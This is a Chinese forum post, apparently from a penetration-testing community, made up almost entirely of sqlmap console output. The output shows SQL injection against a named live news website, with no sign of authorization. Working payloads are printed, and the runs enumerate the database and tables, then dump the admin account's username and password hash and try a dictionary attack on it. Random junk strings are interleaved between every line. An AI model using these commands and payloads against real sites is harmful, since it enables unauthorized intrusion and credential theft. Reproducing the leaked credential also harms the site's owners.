中国网络渗透测试联盟
标题:
sqlmap实例注入mysql
[打印本页]
作者:
admin
时间:
2013-4-4 22:18
标题:
sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
2 [$ R, L5 Q/ g9 h8 b/ q
ms "Mysql" --current-user /* 注解:获取当前用户名称
$ E+ i+ v7 X5 z6 p6 r) J
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ t3 ]. e3 S3 e( r1 `' [
http://sqlmap.sourceforge.net
starting at: 16:53:54
9 `3 E; y4 [5 F+ z1 u
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
: u8 Q' o! Q( c, J% n) ?/ P' k5 t% X4 u
session file
7 t2 {4 u4 I9 p; z" o$ d+ i
[16:53:54] [INFO] resuming injection data from session file
) ?1 @; c( k4 R' _* @; U/ c
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 D6 d% x3 K$ d$ A4 ?
[16:53:54] [INFO] testing connection to the target url
/ | K% ~3 o& D4 D0 {3 ^, F8 X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% ^8 K' m/ s, [$ Z5 D+ x. g1 R
sts:
- b5 a: r3 U1 x" T8 Z) w
---
8 a5 ]0 ^' a X+ [
Place: GET
% z. c& n* J. _$ v( b
Parameter: id
C$ n5 V! \' i
Type: boolean-based blind
2 d7 c* r8 X& Y
Title: AND boolean-based blind - WHERE or HAVING clause
3 v5 n( r3 C+ h0 [# j
Payload: id=276 AND 799=799
$ ?! X9 {+ c9 \
Type: error-based
W" l8 v5 \2 ^: E0 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ z9 n. d* g" w6 l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# s# |( U& P$ B0 {; r. M
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 ?3 U2 m/ f/ ?- Y- m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; C8 C; G& s9 ]5 M2 k
Type: UNION query
! D3 e) X. |* X# c0 Z, {- q7 g
Title: MySQL UNION query (NULL) - 1 to 10 columns
# y8 ?7 x; U. `# S, w
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 ?. U6 Q! ? |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" H. M( l: E. T/ W' |
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. R/ L$ {- r1 }3 ^
Type: AND/OR time-based blind
, o, C2 H6 g& l
Title: MySQL > 5.0.11 AND time-based blind
9 ~/ y+ E; L q* i l
Payload: id=276 AND SLEEP(5)
$ w- v8 \5 k6 u$ j- d. V9 l% E* z
---
- R) _: J: N& b& B; M9 a9 i
[16:53:55] [INFO] the back-end DBMS is MySQL
# m8 P3 v; v. l" e& y& X+ n' P
web server operating system: Windows
* s4 r, u0 N% J; \% U
web application technology: Apache 2.2.11, PHP 5.3.0
' g* l* I7 N' y- W% x: O
back-end DBMS: MySQL 5.0
3 V3 ]9 U/ Q8 ~# B* X6 B/ g
[16:53:55] [INFO] fetching current user
! T6 n+ e$ H% W1 }
current user: 'root@localhost'
2 j* `# A! R% e/ | B% c9 y: ]
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
6 H; f" Q6 W# Y$ T ~% B4 `9 S5 A0 s
tput\
www.wepost.com.hk
'
shutting down at: 16:53:58
3 h8 M8 q& x3 k( p1 l |2 U9 M
/ N' Q. m" Q6 c% u8 ]
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
l1 c1 y9 D* q0 t; ~, ~* U
ms "Mysql" --current-db /*当前数据库
! b1 W, k. K7 P) q2 `& v% c
sqlmap/0.9 - automatic SQL injection and database takeover tool
) v: ~& s) m6 T) M' ]2 O0 H1 \
http://sqlmap.sourceforge.net
starting at: 16:54:16
9 F* H8 y# A/ V5 X
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
( c* R+ N/ M% Q) E7 g D- P* {
session file
4 _2 k& q0 g5 }0 E: D" {" W, T1 I; F
[16:54:16] [INFO] resuming injection data from session file
, C) ~. V" V. `# V3 l
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ m* D. i# D% C4 s0 Q
[16:54:16] [INFO] testing connection to the target url
9 d4 h! D( w" V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
A/ c+ L; |; P, S2 v
sts:
- [; h, x \; p, \
---
% a* u1 s; r! z5 x$ \
Place: GET
: [* q O9 D+ t
Parameter: id
; c8 I' x+ A/ n1 P- T/ v
Type: boolean-based blind
1 t' J' L2 `) Q' ^
Title: AND boolean-based blind - WHERE or HAVING clause
4 e) x! Z! w0 K$ d: V0 l( L
Payload: id=276 AND 799=799
5 c2 P7 D, V. X w. m
Type: error-based
; c; P g4 I0 @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
B; b; s2 V/ B; |! c% a: S
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; f2 {& D( D: m" T1 E$ i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 T- O3 v" O$ e5 D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# `! v C% B+ N. p
Type: UNION query
5 w8 P. x' p) f# O9 W5 h- J, \/ w
Title: MySQL UNION query (NULL) - 1 to 10 columns
) ~6 `7 S& _. z S
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" Y; f9 V, i7 L2 x/ m) K* K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( I; \( ]% ?9 k* V3 W+ u" Z7 s5 f
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: i% d( Z4 v& l- |' Y, O' I
Type: AND/OR time-based blind
' }. x9 y# g+ h
Title: MySQL > 5.0.11 AND time-based blind
/ o# D8 j, x' R! s$ J- {! J
Payload: id=276 AND SLEEP(5)
s% A$ R# p! h8 f
---
7 H! q; l2 s: `- V
[16:54:17] [INFO] the back-end DBMS is MySQL
8 @" H+ L- @$ X, S4 L& D I4 [9 P0 V
web server operating system: Windows
0 X- n$ O t% M( ^3 d1 l
web application technology: Apache 2.2.11, PHP 5.3.0
: D% }" {, r* D& H. ^! j& o
back-end DBMS: MySQL 5.0
' z+ y& E) G8 v% K% c' P
[16:54:17] [INFO] fetching current database
5 p7 ^0 ~0 h0 H4 W7 b( g
current database: 'wepost'
# U9 P9 J0 \8 y a8 I
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
( m# |5 P6 T% z
tput\
www.wepost.com.hk
'
shutting down at: 16:54:18
& I- O, X2 o' f. }" L
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
# W" C" I1 o$ ]
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
3 Z1 N6 \/ c; n1 r; A
sqlmap/0.9 - automatic SQL injection and database takeover tool
( c! j- k8 c+ A* X
http://sqlmap.sourceforge.net
starting at: 16:55:25
0 V+ g/ y+ o+ z/ r" K M8 x8 j) I( o
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
! t% q5 X7 X* s# y
session file
" Q# D% B3 g( j: n
[16:55:25] [INFO] resuming injection data from session file
) R- c9 m+ \) M5 k/ l" j! U
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% z0 P0 Y, a0 @$ [
[16:55:25] [INFO] testing connection to the target url
$ T: }% [# j' G; o; Y6 J- N/ X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ D) Z! q0 \$ ~. t% g8 @6 o
sts:
# I2 @1 r) H( b, N
---
" h4 @3 O3 k) o& v
Place: GET
% o# e" t: B9 P* d
Parameter: id
. }) H/ W! e6 u7 e# t- H
Type: boolean-based blind
) _+ Y* I; Z9 G6 `, x
Title: AND boolean-based blind - WHERE or HAVING clause
0 W. U. G* s9 o- l
Payload: id=276 AND 799=799
2 S3 l0 ?$ J Q" E1 w$ G3 I3 C
Type: error-based
* A. A0 K5 k7 I; i2 E# z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 n) u, o; Y$ t* F0 [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! w& [8 C+ T& \0 z2 c1 A9 S9 d
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
+ \7 l5 y Q5 o+ M S' K: B1 A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ G+ [( {- W0 J; } ^3 z
Type: UNION query
, ] C. Q# f+ P P' q# T
Title: MySQL UNION query (NULL) - 1 to 10 columns
* L! p/ E- V! Z* T$ E
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. {. }% I2 Z# V! K- }+ x* {" D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ y' G3 K1 F6 G
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 c3 S3 z. ^# ?* D; v1 t
Type: AND/OR time-based blind
- X. Z9 k% f: y
Title: MySQL > 5.0.11 AND time-based blind
4 R! y6 n W W# c; i2 l4 Z- x6 Z
Payload: id=276 AND SLEEP(5)
' \% v& F. G/ _! H8 l
---
7 c% J5 j% h$ u. y1 r
[16:55:26] [INFO] the back-end DBMS is MySQL
4 |/ d4 F) `2 _$ _/ C o
web server operating system: Windows
' @& f1 ~; m! j. h1 f" L3 k1 a
web application technology: Apache 2.2.11, PHP 5.3.0
1 I! t1 P0 w$ K5 p9 L
back-end DBMS: MySQL 5.0
2 u0 T. M! `; }6 r) Z3 k, t: }
[16:55:26] [INFO] fetching tables for database 'wepost'
. x- u& e) P% Q" r7 x
[16:55:27] [INFO] the SQL query used returns 6 entries
8 V+ n2 O4 o. ^2 w) c- {; T
Database: wepost
- x: P/ y1 X' T/ Z2 {
[6 tables]
a$ S: P( J. V: u( q1 ]
+-------------+
7 S2 c* |. _; H0 j
| admin |
7 h- V4 H8 e$ {, [+ b
| article |
! u- p H: u; Z! ?2 U+ \+ K
| contributor |
. M6 f$ T9 g+ G7 V2 e
| idea |
" H0 O( R% g/ f1 F; V1 w) l
| image |
8 U- k5 f4 V$ i
| issue |
: r5 X9 s& R, X1 U2 ^" |$ Q" j0 g* `
+-------------+
: o1 ]5 z; \; N
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 q& ]9 c Z N4 h1 V6 n9 `
tput\
www.wepost.com.hk
'
shutting down at: 16:55:33
$ ~" o' E+ M5 s9 M1 v( ?* W/ Q) ^
' \, w. c$ y$ b% a3 x7 X8 ]
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
" |9 M1 T2 a% M- ~
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
2 v, K( R) _4 A+ Y1 u; y
sqlmap/0.9 - automatic SQL injection and database takeover tool
' O% O5 ]( \, { l2 C) P
http://sqlmap.sourceforge.net
starting at: 16:56:06
( i6 x. G7 t6 i+ G. j
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 v) [2 i' ?4 Z
sts:
* B4 A1 B/ k$ w. o
---
! c( W7 K. X" d; x9 u
Place: GET
! k5 s! {, Y: v8 M
Parameter: id
( c: O" ~- ]9 ~8 A- }8 e8 \
Type: boolean-based blind
6 W! g+ s7 u- i" X1 f
Title: AND boolean-based blind - WHERE or HAVING clause
8 J, L( {# G8 U* K
Payload: id=276 AND 799=799
; }! U4 P0 I& V0 P+ ?& J
Type: error-based
( `/ E7 ^4 h3 ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- @8 z9 Q# J: e3 T6 V7 _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: N6 U" t$ N* ~4 ^
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 Q! h" y3 g# }3 S5 e3 {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# l5 s9 u" v5 h0 B
Type: UNION query
1 ^3 ]; w' B2 Y8 J) L4 c
Title: MySQL UNION query (NULL) - 1 to 10 columns
# [* H/ T) H' t/ d# X1 D% h2 r
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# c! A/ s" S E& s! n1 @2 i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& Y* j2 J( w8 J. M8 Z9 l: t6 I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 {2 C" u! I8 g/ D2 R: {
Type: AND/OR time-based blind
( n/ U4 ]/ P" G: I, b7 W
Title: MySQL > 5.0.11 AND time-based blind
$ H# M- D5 F5 d8 [1 X# [
Payload: id=276 AND SLEEP(5)
5 Q: f% ^. Y* o, N: c
---
$ K! x9 ^, q' r3 Y+ h
web server operating system: Windows
. j/ N, l2 \5 x5 S, d0 d
web application technology: Apache 2.2.11, PHP 5.3.0
l0 q5 a7 O7 ~* f# T6 w3 j y2 ]: u
back-end DBMS: MySQL 5.0
9 o0 M5 c; _" L! _- `5 N
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\se
& o& p* x+ o0 R9 V3 X
ssion': wepost, wepost
2 p3 ]4 K5 W# [' y( ~5 L
Database: wepost
! w5 \- a, }0 ^0 Y# l
Table: admin
$ x7 A% S7 a; T5 Z
[4 columns]
/ M6 [) }0 \% K1 d( }- g J. }- X e
+----------+-------------+
& N+ S4 G6 @8 f% N+ N4 }$ p
| Column | Type |
- w4 w4 e. U7 `4 z5 k3 c. S
+----------+-------------+
9 A' I Q/ q) }5 w ~ G
| id | int(11) |
) q4 f- O' j! S" [2 j F+ [' h3 S
| password | varchar(32) |
8 T, m. [( V @2 O! R! ?
| type | varchar(10) |
' [$ ^' V- ~2 a1 Y! d1 B3 w
| userid | varchar(20) |
+ v0 N0 g& o; c. n
+----------+-------------+
6 M/ x$ k% _; V5 C6 q$ j
shutting down at: 16:56:19
, q( Y; E7 J8 _. ]% L% m6 C- p; k2 p
$ P( N/ R B r5 a, G1 @2 H& C, h+ j
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
) x9 G/ g; F) M( X& e
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& _* L% i7 T; y% ]7 N! y
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 r* c3 v0 S C5 `
http://sqlmap.sourceforge.net
starting at: 16:57:14
: {( C& A& D6 h6 ]1 n
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 U2 U5 {% v; G( L- p' e
sts:
7 n Y4 _ w: Z
---
/ y" x/ D7 A' x$ F
Place: GET
0 s9 X1 _1 G$ k; ^8 \9 N9 F u
Parameter: id
' o1 \- d% a1 W3 f" ]7 }) l+ ~# d- ?7 j
Type: boolean-based blind
~3 ?; x" K/ Y
Title: AND boolean-based blind - WHERE or HAVING clause
' K/ J- N: J- m! [7 o
Payload: id=276 AND 799=799
Z! h! r2 U" ]' y- J1 F
Type: error-based
+ j9 d$ c# k( [- M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ A; I+ x3 G8 h, K& V; Y/ v" w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 K+ A& J3 S; y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 P: t' E2 T; m, r8 t: C; T2 W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 ?1 g+ y% i/ L b0 R9 H
Type: UNION query
. t' w0 ~/ F: C$ z2 U
Title: MySQL UNION query (NULL) - 1 to 10 columns
. `4 \$ [ x# J* F1 I) _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 O3 ~ f, ?! F9 Z7 s
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 B1 }1 f; Z( ]* L7 d5 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- b+ p5 K1 c+ u/ A! M
Type: AND/OR time-based blind
+ @* G, K% C1 Y3 _) j
Title: MySQL > 5.0.11 AND time-based blind
% L" `" Q. Q4 P' b6 T
Payload: id=276 AND SLEEP(5)
: y, h4 x1 q5 |' K; x4 L4 W
---
/ N5 A4 B. X8 r2 y+ k( c
web server operating system: Windows
! U9 S0 s& y: s/ C3 A! a
web application technology: Apache 2.2.11, PHP 5.3.0
8 P: O. d+ L$ f/ B5 z! j) E
back-end DBMS: MySQL 5.0
: r# m+ w( ]1 x) W
recognized possible password hash values. do you want to use dictionary attack o
9 U+ x4 C( q( u! c5 Y X( e# _
n retrieved table items? [Y/n/q] y
! T8 F# N! I. v
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
$ B; g0 K3 @& Q
do you want to use common password suffixes? (slow!) [y/N] y
0 g2 ~+ c$ ~! n+ b! `4 Y; ^
Database: wepost
; i! D2 E4 ?6 _8 V
Table: admin
! E C! l$ n0 X0 k* M2 M8 b
[1 entry]
" B. D5 h/ p5 a" \! J, o9 z
+----------------------------------+------------+
( {) h1 O3 a& |; F8 i% e
| password | userid |
( g* o V2 `) b* x2 X; X! m+ {9 R" }
+----------------------------------+------------+
7 @% V6 r1 n8 v0 W- j: Q$ C" ?
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" C* |+ |3 B/ X+ u% D
+----------------------------------+------------+
. {) I5 t. h% u1 G; V3 s2 F6 D5 ?
shutting down at: 16:58:14
; i, _( X4 d( U$ b5 f+ f0 g0 b
: w; n& b& h6 b& t
D:\Python27\sqlmap>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2